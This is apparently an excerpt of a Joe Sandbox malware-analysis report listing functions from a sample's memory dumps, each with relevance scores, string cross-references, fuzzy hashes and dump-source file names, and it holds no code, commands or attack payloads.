Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffb4b3e0000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71b78f01666a87c8a7bb23815ca3e4e2e0ed17d478db7b229798acd43db9c40f
Instruction ID: 4e40dd4d56ce21f33fe5ad62e7c2fd1effd90e19d1d508ab3b198c1816515bf2
Opcode Fuzzy Hash: 71b78f01666a87c8a7bb23815ca3e4e2e0ed17d478db7b229798acd43db9c40f
Instruction Fuzzy Hash: 3B51B1B6A18E899EE389DF6CC8557A97FD1EB95310F5001BBC10EE7BD1CE7418128350

Function 00007FFB4B7D3150 Relevance: 5.5, Strings: 4, Instructions: 520
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

1L, xrefs: 00007FFB4B7D37C4
, xrefs: 00007FFB4B7D3632
1L, xrefs: 00007FFB4B7D3308
1L, xrefs: 00007FFB4B7D3391

Memory Dump Source

Source File: 0000000D.00000002.1768934598.00007FFB4B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffb4b7d0000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID: $1L$1L$1L
API String ID: 0-634295820
Opcode ID: 48e33e21bbcd570f5d401b77b72b71e2283939367f63d4fe505ca299e701a211
Instruction ID: ff2bb7f72d4463d1f4a09b28c113bfff523a021d21dfb91811824cdf6a99959c
Opcode Fuzzy Hash: 48e33e21bbcd570f5d401b77b72b71e2283939367f63d4fe505ca299e701a211
Instruction Fuzzy Hash: 2C02C3B090DA4A8FE749EF78C5916B8BBA4FF44340F1581B9D14EC76A2DB3CA841CB54

Function 00007FFB4B7D4871 Relevance: 4.3, Strings: 3, Instructions: 514
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

8DK, xrefs: 00007FFB4B7D4C04
1L, xrefs: 00007FFB4B7D4A07
1L, xrefs: 00007FFB4B7D49A6

Memory Dump Source

Source File: 0000000D.00000002.1768934598.00007FFB4B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffb4b7d0000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID: 8DK$1L$1L
API String ID: 0-285659467
Opcode ID: a2005c0590a97586266246d20549ce046ae21c77350ca1747bcd860a6b801af0
Instruction ID: 7994403f1cccb4f71b2e9db6bebf8cd677211f239af3f39c10b756fb9cf6690a
Opcode Fuzzy Hash: a2005c0590a97586266246d20549ce046ae21c77350ca1747bcd860a6b801af0
Instruction Fuzzy Hash: D302F4B094EA468FE768EF2CC6951B977E4FF44340B50857EC14EC35B2DE29B8418749

Function 00007FFB4B4474D2 Relevance: 4.3, Strings: 3, Instructions: 507
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 00007FFB4B447A22
1L, xrefs: 00007FFB4B4476F8
1L, xrefs: 00007FFB4B447781

Memory Dump Source

Source File: 0000000D.00000002.1765267150.00007FFB4B442000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B442000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffb4b442000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID: $1L$1L
API String ID: 0-2819116826
Opcode ID: 39477d05f3ffc646bfe58db70d1a17081b8f81976a56b5cd2fcf9fba9de5fb2a
Instruction ID: 1e66cc00fb6ca4d66fd5e12fc3cc2a6a1478e3e55d23951906a12a5c409ed440
Opcode Fuzzy Hash: 39477d05f3ffc646bfe58db70d1a17081b8f81976a56b5cd2fcf9fba9de5fb2a
Instruction Fuzzy Hash: A802B6B090C95A8FE74DEF78C5616B8B7A1FF44300F5481B9C14ED7696CB38A852CB91

Function 00007FFB4B446A06 Relevance: 4.0, Strings: 3, Instructions: 264
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

1L, xrefs: 00007FFB4B446B5B
1L, xrefs: 00007FFB4B446BD1
1L, xrefs: 00007FFB4B446C1D

Memory Dump Source

Source File: 0000000D.00000002.1765267150.00007FFB4B442000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B442000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffb4b442000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID: 1L$1L$1L
API String ID: 0-3779445144
Opcode ID: 2eb8f4e9a37516e7c3de0d41db06e9d0bb75483b5c25178ccd6a64f394a359be
Instruction ID: ae7513c539e9bba324b8fa53e3e55414131dd8b7b6f46fba246c5b1ed49466f2
Opcode Fuzzy Hash: 2eb8f4e9a37516e7c3de0d41db06e9d0bb75483b5c25178ccd6a64f394a359be
Instruction Fuzzy Hash: 1F8133B1A0CA624BE3ACAE78D5651B577E0EF42310B1484FED58FC31A3DD38B8168B51

Function 00007FFB4B7D2616 Relevance: 4.0, Strings: 3, Instructions: 262
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

1L, xrefs: 00007FFB4B7D27E7
1L, xrefs: 00007FFB4B7D2833
1L, xrefs: 00007FFB4B7D277B

Memory Dump Source

Source File: 0000000D.00000002.1768934598.00007FFB4B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffb4b7d0000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID: 1L$1L$1L
API String ID: 0-3779445144
Opcode ID: 92ae9c9f6a36d76b09415de4ea7dd0b4f4d502763ad934c4ff84dafafc2a9525
Instruction ID: a5d248e1f98d1c2bfc0abff9d1bd4c9958e0a945f7f752b59ef31b620526e88b
Opcode Fuzzy Hash: 92ae9c9f6a36d76b09415de4ea7dd0b4f4d502763ad934c4ff84dafafc2a9525
Instruction Fuzzy Hash: 528145B1A0EB424BFB65AE38D5011B577E4EF45360B10817ED78EC25B2DE28B4038756

Function 00007FFB4B448C60 Relevance: 2.9, Strings: 2, Instructions: 421
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

1L, xrefs: 00007FFB4B448DF7
1L, xrefs: 00007FFB4B448D96

Memory Dump Source

Source File: 0000000D.00000002.1765267150.00007FFB4B442000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B442000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffb4b442000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID: 1L$1L
API String ID: 0-3414519530
Opcode ID: 4da2c3cc88e743ddf0c83f554ad0a6c5992ba05051cca33ea07bdebafdfb4e0f
Instruction ID: e50d71457cb09bd53fdff522626e03768b218803e9057722741d479112fa5c32
Opcode Fuzzy Hash: 4da2c3cc88e743ddf0c83f554ad0a6c5992ba05051cca33ea07bdebafdfb4e0f
Instruction Fuzzy Hash: 68E125B0A0DA168FD36DEF38D6A057577E1FF54310B2085BEC18EC36A2DE29B8568741

Function 00007FFB4B447030 Relevance: 2.6, Strings: 2, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

1L, xrefs: 00007FFB4B447082
1L, xrefs: 00007FFB4B4470C6

Memory Dump Source

Source File: 0000000D.00000002.1765267150.00007FFB4B442000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B442000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffb4b442000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID: 1L$1L
API String ID: 0-3414519530
Opcode ID: 88ba6f7c319cdb3f34cb4d1b0c1de0bff14efb457afb29ebeb5e8573149af9fc
Instruction ID: e9094a52309b4195bb72a385b9b6f3116a19021c244ba34e9d1ba3dd96ced0e0
Opcode Fuzzy Hash: 88ba6f7c319cdb3f34cb4d1b0c1de0bff14efb457afb29ebeb5e8573149af9fc
Instruction Fuzzy Hash: BD110E6172CE094FDA54FF28D550AFA73E0EF94300B104A3AC64EC35A2CE29B60A8390

Function 00007FFB4B7D2C40 Relevance: 2.6, Strings: 2, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

1L, xrefs: 00007FFB4B7D2C92
1L, xrefs: 00007FFB4B7D2CD6

Memory Dump Source

Source File: 0000000D.00000002.1768934598.00007FFB4B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffb4b7d0000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID: 1L$1L
API String ID: 0-3414519530
Opcode ID: fd473ad6593b3d91f2784b0f8d9544d69b17d0a12970e4cbaef9a2dd4d56136c
Instruction ID: 37ddd1a7a5b786a3286e0f5feafdad5a898a1951874fd2e54840323ee66acba0
Opcode Fuzzy Hash: fd473ad6593b3d91f2784b0f8d9544d69b17d0a12970e4cbaef9a2dd4d56136c
Instruction Fuzzy Hash: 5911296062CD494AEF55FF34D4156FAB3A0EF50304F10457AC68EC34E2CE19FA568380

Function 00007FFB4B7D2ABE Relevance: 2.6, Strings: 2, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

1L, xrefs: 00007FFB4B7D2C92
1L, xrefs: 00007FFB4B7D2C0C

Memory Dump Source

Source File: 0000000D.00000002.1768934598.00007FFB4B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffb4b7d0000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID: 1L$1L
API String ID: 0-3414519530
Opcode ID: bcc081a86815638cf61dc57f5c673c967b2f27d87c20072c5d29d6b4c0d6655f
Instruction ID: 6f0757091d5efe4af6e083f652e2ef7b1b5d9eef601a3899b0564b4df74d4092
Opcode Fuzzy Hash: bcc081a86815638cf61dc57f5c673c967b2f27d87c20072c5d29d6b4c0d6655f
Instruction Fuzzy Hash: F601263134D50A4BEF05EE28D8697F9B390EB90354F24417ECA49C36E1DA1AAA62C780

Function 00007FFB4B446EAE Relevance: 2.6, Strings: 2, Instructions: 51
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

1L, xrefs: 00007FFB4B446FFC
1L, xrefs: 00007FFB4B447082

Memory Dump Source

Source File: 0000000D.00000002.1765267150.00007FFB4B442000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B442000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffb4b442000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID: 1L$1L
API String ID: 0-3414519530
Opcode ID: debc6847fd5b1def602d1db05e065d50efbe86cf9bba69310cbac970acf4677a
Instruction ID: 281e308692043f95a91f131a0230831f9a8acfbc3a9e851e9ff79e4aef1ac41f
Opcode Fuzzy Hash: debc6847fd5b1def602d1db05e065d50efbe86cf9bba69310cbac970acf4677a
Instruction Fuzzy Hash: FF012D3130C94B4FEB44DF1CD4547F57791EB95314F24457EDA19C36E1CA6AA66087C0

Function 00007FFB4B445960 Relevance: 1.9, Strings: 1, Instructions: 672
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

1L, xrefs: 00007FFB4B445F5D

Memory Dump Source

Source File: 0000000D.00000002.1765267150.00007FFB4B442000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B442000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffb4b442000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID: 1L
API String ID: 0-1980451630
Opcode ID: f31169eeb742f5fe03290ddb38227fa01ce951ce8ec1b0d1030496daace2b8b5
Instruction ID: 287d31fb4df25c7ba2a8803354ec6509b1a2bddcfdbef8b49920be0d73088556
Opcode Fuzzy Hash: f31169eeb742f5fe03290ddb38227fa01ce951ce8ec1b0d1030496daace2b8b5
Instruction Fuzzy Hash: 9322A670A1CA198FDF9CEF18C999A6973E2FF54310B5081B9D15DC72A2DE24EC55CB80

Function 00007FFB4B425035 Relevance: 1.7, APIs: 1, Instructions: 157
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileTransactedW.KERNEL32 ref: 00007FFB4B425139

Memory Dump Source

Source File: 0000000D.00000002.1765267150.00007FFB4B411000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B411000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffb4b411000_JPOyDhPFIytu.jbxd

Similarity

API ID: CreateFileTransacted
String ID:
API String ID: 2149338676-0
Opcode ID: 191bd0192a9f1beb8a8209519b53078e8b489a8aeaab2d7838794a300f1ba70e
Instruction ID: d28ddf2303e94202115b7728e1f7fc6c7d00044ccc6628a5d9096503b58d645f
Opcode Fuzzy Hash: 191bd0192a9f1beb8a8209519b53078e8b489a8aeaab2d7838794a300f1ba70e
Instruction Fuzzy Hash: 33419F7181CB588FDB58EF58D8456AD7BF0FBA9710F04426FE489D3251CA74A8458BC2

Function 00007FFB4B425211 Relevance: 1.6, APIs: 1, Instructions: 137fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FFB4B4252E7

Memory Dump Source

Source File: 0000000D.00000002.1765267150.00007FFB4B411000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B411000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffb4b411000_JPOyDhPFIytu.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 827f9a93143d8ce862ce99dde9e6bad5d8fc38241c835be077683c4be3fd6837
Instruction ID: d4e768149f4595020630498119c030194ffedae993d4570fb919e642f536cee0
Opcode Fuzzy Hash: 827f9a93143d8ce862ce99dde9e6bad5d8fc38241c835be077683c4be3fd6837
Instruction Fuzzy Hash: 8531C07190CA5C8FDB18DF58D8456F9BBE1FBA9311F00826FD049D3292CB74A846CB81

Function 00007FFB4B7D3A3F Relevance: 1.5, Strings: 1, Instructions: 284COMMON

Download Yara Rule

Strings

1L, xrefs: 00007FFB4B7D3B50

Memory Dump Source

Source File: 0000000D.00000002.1768934598.00007FFB4B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffb4b7d0000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID: 1L
API String ID: 0-1980451630
Opcode ID: a8ef5ed287bba1e3cec7363b14aab2e32b4684e6821a9835e5795241efc71418
Instruction ID: cc5bb21897808759f940a8398b9c7abf276ba931a6e434c38294503c054fa02b
Opcode Fuzzy Hash: a8ef5ed287bba1e3cec7363b14aab2e32b4684e6821a9835e5795241efc71418
Instruction Fuzzy Hash: 15A115B091D64A8FE759DF28C5906B43BA4FF44340F5486BDC94ECB1AACA2CA881CB44

Function 00007FFB4B447E2F Relevance: 1.5, Strings: 1, Instructions: 281COMMON

Download Yara Rule

Strings

1L, xrefs: 00007FFB4B447F40

Memory Dump Source

Source File: 0000000D.00000002.1765267150.00007FFB4B442000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B442000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffb4b442000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID: 1L
API String ID: 0-1980451630
Opcode ID: d3bc6886ee80d2a3d7cf5aa96b8e43a834672f5911b495f5cd5f938d71a41ef9
Instruction ID: ecfc2561eaaf3adce562d068760a877edaa9d8d975c930406c97a0ca2ef76544
Opcode Fuzzy Hash: d3bc6886ee80d2a3d7cf5aa96b8e43a834672f5911b495f5cd5f938d71a41ef9
Instruction Fuzzy Hash: FFA1367091C66A8FE75DDF28C5A06B47BA1FF44310F5485FDC94ACB697CA38A892CB40

Function 00007FFB4B444B69 Relevance: 1.5, Strings: 1, Instructions: 252COMMON

Download Yara Rule

Strings

1L, xrefs: 00007FFB4B444CDD

Memory Dump Source

Source File: 0000000D.00000002.1765267150.00007FFB4B442000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B442000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffb4b442000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID: 1L
API String ID: 0-1980451630
Opcode ID: b7efc3c99741f569c888ff324dc8fb9a2f5195256ab472def3b034192d0617fc
Instruction ID: 600721d24b011ee9486f08dfda5fee5ddab4df0c3a4b5a00311bee3be0dc1f8c
Opcode Fuzzy Hash: b7efc3c99741f569c888ff324dc8fb9a2f5195256ab472def3b034192d0617fc
Instruction Fuzzy Hash: BE718CB090C4594FE76CFE3CC9665BA37C0FF84314B1942B9E65EC75B2DD28A8268781

Function 00007FFB4B44572B Relevance: 1.5, Strings: 1, Instructions: 247COMMON

Download Yara Rule

Strings

1L, xrefs: 00007FFB4B4458DA

Memory Dump Source

Source File: 0000000D.00000002.1765267150.00007FFB4B442000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B442000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffb4b442000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID: 1L
API String ID: 0-1980451630
Opcode ID: b8d730a3384ce62d67cd40eb6da16ca66b819257f9ff42a2a0132a554073465a
Instruction ID: 105ac648b73c14cea1a283e07b2a052df78e6464aef2096680b1ee948fa7f6a6
Opcode Fuzzy Hash: b8d730a3384ce62d67cd40eb6da16ca66b819257f9ff42a2a0132a554073465a
Instruction Fuzzy Hash: E581B0B0D1DA5E8EEF59EF78C8606BDBBB1EF49300F1045BAD10EC71A1DE2868528751

Function 00007FFB4B7D076D Relevance: 1.5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

Strings

1L, xrefs: 00007FFB4B7D08CD

Memory Dump Source

Source File: 0000000D.00000002.1768934598.00007FFB4B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffb4b7d0000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID: 1L
API String ID: 0-1980451630
Opcode ID: de33e26f1f971a4a53a22c8bd9a804cf6141122f5bb9d4e71495071de50cfa4e
Instruction ID: 4ff5ab6c4d9733440099c349d58ccde7993490e9d14ab115fd3c16ae1cad379f
Opcode Fuzzy Hash: de33e26f1f971a4a53a22c8bd9a804cf6141122f5bb9d4e71495071de50cfa4e
Instruction Fuzzy Hash: 596179B060E5494FE768FE38E9265B937D4FF84350B0052B9D29ED3572DD18A80687C5

Function 00007FFB4B7D131B Relevance: 1.5, Strings: 1, Instructions: 231COMMON

Download Yara Rule

Strings

1L, xrefs: 00007FFB4B7D14CA

Memory Dump Source

Source File: 0000000D.00000002.1768934598.00007FFB4B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffb4b7d0000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID: 1L
API String ID: 0-1980451630
Opcode ID: f588afdb9f295cd03cc6a63a81829c99784ec2a36ea8aa0817ddcd0870fc0daf
Instruction ID: c91b41046f19d7fe69a46727469c8326423a0012a577c7a52463ef3a5732dee0
Opcode Fuzzy Hash: f588afdb9f295cd03cc6a63a81829c99784ec2a36ea8aa0817ddcd0870fc0daf
Instruction Fuzzy Hash: 8071E0B0E1E64A8EEB55EF78C5506FD7BA4FF45380F1041BAD10ED39B2DE2868528744

Function 00007FFB4B44792A Relevance: 1.4, Strings: 1, Instructions: 137COMMON

Download Yara Rule

Strings

, xrefs: 00007FFB4B447A22

Memory Dump Source

Source File: 0000000D.00000002.1765267150.00007FFB4B442000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B442000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffb4b442000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 1793b24df83540b2cee6e307fffaba372ccf83e6ffde1bc9383f1fe0ece15216
Instruction ID: ecb008217dcc9429facce516a79a3ec769f517b0e0a42bc7374e6410ce724098
Opcode Fuzzy Hash: 1793b24df83540b2cee6e307fffaba372ccf83e6ffde1bc9383f1fe0ece15216
Instruction Fuzzy Hash: 9E416FB1E0C55E9FEB49EFA8C4655EDB7B1FF44300F1481BAD109E7292CA382906CB50

Function 00007FFB4B7D353A Relevance: 1.4, Strings: 1, Instructions: 137COMMON

Download Yara Rule

Strings

, xrefs: 00007FFB4B7D3632

Memory Dump Source

Source File: 0000000D.00000002.1768934598.00007FFB4B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffb4b7d0000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: fd16a36edbaa1b74079b94b9363a698ef3a0b2295f629ab6eb2b1b793dc52b26
Instruction ID: d62d3bd7d34556be9704e4208dbcd7795a708fb8bd64a9fbd11744fd9471e030
Opcode Fuzzy Hash: fd16a36edbaa1b74079b94b9363a698ef3a0b2295f629ab6eb2b1b793dc52b26
Instruction Fuzzy Hash: 9F419FB2D0D64E8FDB49EFB8D9915EDB7B5EF44340F0181B9C10AD72A2DA3C29058B50

Function 00007FFB4B4464DE Relevance: 1.4, Strings: 1, Instructions: 102COMMON

Download Yara Rule

Strings

1L, xrefs: 00007FFB4B446575

Memory Dump Source

Source File: 0000000D.00000002.1765267150.00007FFB4B442000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B442000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffb4b442000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID: 1L
API String ID: 0-1980451630
Opcode ID: 060cbca7159f74ce675b942db828ccaf6bc497f4b9174d980bbe5e1495b40da5
Instruction ID: 2a29a57f5fd4cbc0d0e16addd35520a19d395b38d3413510608abc90ad1e98b8
Opcode Fuzzy Hash: 060cbca7159f74ce675b942db828ccaf6bc497f4b9174d980bbe5e1495b40da5
Instruction Fuzzy Hash: A231E9B1A1CA594FE798EF2CE9612B8B7A1FF45310B1481B9D11EC36D6DE347816CA40

Function 00007FFB4B7D20D3 Relevance: 1.4, Strings: 1, Instructions: 102COMMON

Download Yara Rule

Strings

1L, xrefs: 00007FFB4B7D216A

Memory Dump Source

Source File: 0000000D.00000002.1768934598.00007FFB4B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffb4b7d0000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID: 1L
API String ID: 0-1980451630
Opcode ID: dcdff9573d7ca4b2e6d1623571173c4eefb5617d7cbb4db4fae084cc6f01c285
Instruction ID: 5c660c9f25ccffc1c67b8aa55811734db02d850e7bdc9455a0419d3a39b2168e
Opcode Fuzzy Hash: dcdff9573d7ca4b2e6d1623571173c4eefb5617d7cbb4db4fae084cc6f01c285
Instruction Fuzzy Hash: CE3104B1A0DA494FFB49EB78D9522A8B7E5EF45350F1481B9C34EC32E3CE1968078384

Function 00007FFB4B7D1FFD Relevance: 1.3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

Strings

1L, xrefs: 00007FFB4B7D216A

Memory Dump Source

Source File: 0000000D.00000002.1768934598.00007FFB4B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffb4b7d0000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID: 1L
API String ID: 0-1980451630
Opcode ID: 07dd7706f5dc6e13da4d294dea0cc406438b64533beebaf0a0a16f0de3f93353
Instruction ID: 95ba936dcbf53b6c85f16d40c4b8c3f0d25cfc8411842e5f4026c7f60ba68fc5
Opcode Fuzzy Hash: 07dd7706f5dc6e13da4d294dea0cc406438b64533beebaf0a0a16f0de3f93353
Instruction Fuzzy Hash: 2431B3B1A0C90A5FEB48EF68D5915A8F7E2FF44310B108279D24EC3692CF24B822C7C4

Function 00007FFB4B44640B Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

1L, xrefs: 00007FFB4B446575

Memory Dump Source

Source File: 0000000D.00000002.1765267150.00007FFB4B442000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B442000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffb4b442000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID: 1L
API String ID: 0-1980451630
Opcode ID: a162eb607ca3f724bb02b344efd6a9e7072b4c7e073ef1f05fb12606a7957ebe
Instruction ID: f66f0d0749fb46efda79649ed0a2c2de52efb9626efad13537757a0e5df84623
Opcode Fuzzy Hash: a162eb607ca3f724bb02b344efd6a9e7072b4c7e073ef1f05fb12606a7957ebe
Instruction Fuzzy Hash: CF316FB1B1891A9FDB48EF68C5915ACB7A1FF48310B148579D10DD7696CF34BC22CB80

Function 00007FFB4B7D1F39 Relevance: 1.3, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

1L, xrefs: 00007FFB4B7D1F7F

Memory Dump Source

Source File: 0000000D.00000002.1768934598.00007FFB4B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffb4b7d0000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID: 1L
API String ID: 0-1980451630
Opcode ID: 7491789c4349287d6e92b3bc20cef1a179fddeddb3e98222bd9082a4eab1efb8
Instruction ID: b4fcb984f82f7a975fea8b644125e5b7cecf8a649bc9b1d18847cb6be2fbfbb1
Opcode Fuzzy Hash: 7491789c4349287d6e92b3bc20cef1a179fddeddb3e98222bd9082a4eab1efb8
Instruction Fuzzy Hash: D52167A290F78A0FE356AA7489555A97BE5EB063C0F0440BAE249C71F2DE1C2C168361

Function 00007FFB4B3F3DF9 Relevance: 1.3, Strings: 1, Instructions: 24COMMON

Download Yara Rule

Strings

I, xrefs: 00007FFB4B3F3E16

Memory Dump Source

Source File: 0000000D.00000002.1765267150.00007FFB4B3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B3F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffb4b3f0000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 81825a60013bda4d7a4fc974496f1152aee14b84e48fcd067fa2771f3d0150c2
Instruction ID: 81cd988e21d6b2dd1448e6a0ae0525c111a4b2b764aff7138f2ede94eee6679c
Opcode Fuzzy Hash: 81825a60013bda4d7a4fc974496f1152aee14b84e48fcd067fa2771f3d0150c2
Instruction Fuzzy Hash: CCE01AB154E7D44FCB06EB7488A98443FA0EE6B21178B41EEC189CF1B3E62D9849C701

Function 00007FFB4B444EB7 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1765267150.00007FFB4B442000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B442000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffb4b442000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55057a339a624a7b937929a4daece3eeb01f86139d08ad17eafe3534fa60243f
Instruction ID: 46ab744f94bbc2563fd8de04fbb6a8ab1da010f29175cb6e6097380b7ff281c2
Opcode Fuzzy Hash: 55057a339a624a7b937929a4daece3eeb01f86139d08ad17eafe3534fa60243f
Instruction Fuzzy Hash: 283104D7D0D1A79AFA2DBA78EA310FC5A409F42720F1881FAD64D460E3DC4C255543A1

Function 00007FFB4B7D0AA7 Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1768934598.00007FFB4B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffb4b7d0000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa291cda6c81353b74fc2ac604dfee8aa882a140c70779ccf5e6bc3e550d8d98
Instruction ID: 82d9f3b3a1e94e74190688e5c3a36596320fc29f9913b2c228e37863a92c995d
Opcode Fuzzy Hash: fa291cda6c81353b74fc2ac604dfee8aa882a140c70779ccf5e6bc3e550d8d98
Instruction Fuzzy Hash: 0521C4D2C0F19786F2257F74F6311F85A586F413A0F68A5B7D64D860F2DC0C388162AA

Function 00007FFB4B7D0AD4 Relevance: .3, Instructions: 277COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1768934598.00007FFB4B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffb4b7d0000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10078b39ea2c5b6a539653a3d54237cdc5eda5c790d79db609b31ce6a550bf53
Instruction ID: f14ba259c67142be9526f42a7a59887fa08ce13a7651efd4583ddaef14e0d173
